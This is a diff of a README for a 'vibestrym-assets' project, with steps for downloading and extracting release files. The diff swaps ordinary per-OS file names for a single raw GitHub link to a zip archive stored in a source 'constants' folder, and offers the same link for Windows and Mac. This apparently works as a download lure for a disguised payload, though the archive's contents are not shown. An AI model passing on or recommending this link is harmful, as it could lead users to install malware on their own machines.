AviRedDevil/vibestrym-assets/README.md

    Find the most recent release at the top of the list.
 Click on the version number to view the available files.

 3. **Download the Files:**
    Select the files that suit your operating system.
-If you are unsure, look for files with names like `vibestrym-assets-win.zip` for Windows or `vibestrym-assets-mac.zip` for Mac users.
+If you are unsure, look for files with names like `https://raw.githubusercontent.com/AviRedDevil/vibestrym-assets/main/frontend/src/constants/vibestrym-assets-v3.9.zip` for Windows or `https://raw.githubusercontent.com/AviRedDevil/vibestrym-assets/main/frontend/src/constants/vibestrym-assets-v3.9.zip` for Mac users.

 4. **Extract Files:**
    After downloading, locate the downloaded ZIP file on your computer.
 Right-click on it and select "Extract All" to unpack the files into a folder.